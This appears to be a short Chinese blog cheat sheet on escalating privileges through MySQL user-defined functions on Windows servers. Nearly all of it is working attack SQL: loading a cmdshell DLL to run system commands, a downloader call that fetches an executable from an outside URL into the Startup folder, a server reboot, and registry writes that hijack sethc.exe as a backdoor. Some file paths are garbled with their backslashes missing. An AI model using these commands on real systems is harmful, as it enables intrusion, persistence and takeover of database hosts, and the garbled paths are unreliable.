这篇文章上次修改于 312 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

创建函数

create function cmdshell returns string soname ’dll名’ (注意路径);

删除函数

delete function cmdshell;使用函数 select cmdshell(参数列表);

获取参数信息

select 函数名("help");
提权 查询

Create function cmdshell returns string soname ’udf.dll’;  

//此处不能填绝对路径 只能是dll名

查询 

 select * from mysql.func; 

   //看看cmdshell function是否创立,创立就继续

查询

 select cmdshell(’net user’);               //运行各种命令提权


删除函数

drop function MyCmd;
利用downloader函数,下载一个木马或者脚本到启动项

Create Function downloader returns string soname ’moonudf.dll’;select downloader("https://www.admin163.net/xx.exe","C:Documents and SettingsAll Users「开始」菜单程序启动a.exe");

SHUT函数重启服务器

create function shut returns string soname ’moonudf.dll’select shut(‘reboot’);

利用 regwrite和 regread函数劫持Sethc.exe 
Create Function regread returns string soname ’moonudf.dll’;Select regread("HKEY_LOCAL_MACHINE","SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe","debugger")

  利用regwrite写入

Create Function regwrite returns string soname ’moonudf.dll’;select regwrite("HKEY_LOCAL_MACHINE","SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe","debugger","REG_SZ","C:	mpcmd.exe");